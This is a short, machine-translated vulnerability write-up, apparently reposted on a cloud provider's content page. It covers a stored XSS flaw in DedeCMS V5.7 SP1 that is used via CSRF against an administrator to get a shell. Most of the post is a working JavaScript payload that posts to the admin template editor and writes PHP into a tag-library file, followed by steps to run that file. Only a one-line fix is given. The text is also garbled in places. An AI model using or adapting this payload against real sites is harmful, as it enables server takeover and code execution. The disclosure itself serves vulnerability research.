A stored xss instance in DedeCMS can be used as an administrator (csrf). getshell is successfully tested.

Source: Internet
Author: User

A stored xss instance in DedeCMS can be used as an administrator (csrf). getshell is successfully tested.
DedeCMS-V5.7-UTF8-SP1 Block Storage xss can hit the Administrator getshell successfully test registered account, then login: jscode:

function ajax(){      var request = false;      if(window.XMLHttpRequest) {          request = new XMLHttpRequest();      } else if(window.ActiveXObject) {          var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];          for(var i=0; i<versions.length; i++) {              try {                  request = new ActiveXObject(versions[i]);              } catch(e) {}          }      }      return request;  }var _x = ajax();  postgo();function postgo() {      src="http://10.65.100.235/DedeCMS-V5.7-UTF8-SP1/uploads/dede/tpl.php";      data="actiondo=edittag&action=savetagfile&filename=a.lib.php&content=%3C%3Fphp%0D%0Aphpinfo%28%29%3B%0D%0A%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++";    xhr_act("POST",src,data);  }  function xhr_act(_m,_s,_a){    _x.open(_m,_s,false);cookie = document.cookie;    if(_m=="POST"){_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");_x.setRequestHeader("Cookie",cookie);}      _x.send(_a);      return _x.responseText;  }

 

In order to do the test, we create a test tag in advance, and the TAG content is blank. Then, our js Code is to write phpinfo () to a. lib. php:



Finally we went to access the DedeCMS-V5.7-UTF8-SP1/uploads/include/taglib/a. lib. php, there is no limit to directly see the phpinfo is executed Solution:Htmlcode conversion for all output parts

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.